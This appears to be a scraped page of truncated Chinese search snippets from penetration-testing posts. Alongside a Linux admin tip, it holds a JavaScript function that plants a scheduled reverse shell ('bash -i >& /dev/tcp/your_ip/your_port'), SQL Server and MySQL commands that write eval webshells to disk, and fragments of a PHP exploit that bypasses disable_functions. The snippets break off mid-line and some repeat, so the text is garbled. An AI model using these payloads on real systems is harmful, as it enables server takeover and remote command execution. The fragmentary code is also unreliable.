find $dir -type f -size 0 -exec rm -rf {} \; 27、查找 Linux 系统中的僵尸进程 #!/bin/bash # 查找 Linux 系统中的僵尸进程 # awk 判断 ps 命令输出的第 8 列为 Z 时,显示该进程的 PID 和进程命令 ps aux | awk '{if($8 == "Z"){print $2,$11}}' 28、生成随机密码 urandom 版本...
禁用函数 passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,...
远程调用的js代码如下: functionaddTask(TaskName, execTime, ip, port) {varexecShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'; execShell=encodeURIComponent(execShell);varparams = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=to...
sqlserver导出: exec sp_makewebtask ‘C:\test1.php‘,‘ select ‘‘<%eval request("pass")%>‘‘‘-- 1. mysql命令导出getshell: 方法1 Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma]);?>‘); select xiaoma1 from xiaoma in...
}elseif($p_type==1&&$p_flags==5) {# PT_LOAD, PF_Read_exec$text_size=$p_memsz; } }if(!$data_addr|| !$text_size|| !$data_size)returnfalse;return[$data_addr,$text_size,$data_size]; }functionget_basic_funcs($base,$elf){list($data_addr,$text_size,$data_size) =$elf;for...
function addTask(TaskName, execTime, ip, port) { var execShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'; execShell = encodeURIComponent(execShell); var params = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=toShell&sBody...
通过种种突破终于拿到了webshell,也更加方便地进行shell操作,但是上面提到,由于 disable_functions 的限制,一些函数无法调用,从而导致命令无法执行: 通过phpinfo也能证明上面的猜想: 这里我直接使用gc bypass disable_functions,这里给出示例代码: <?php $command = $_GET['cmd']; ...
禁用函数 passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,...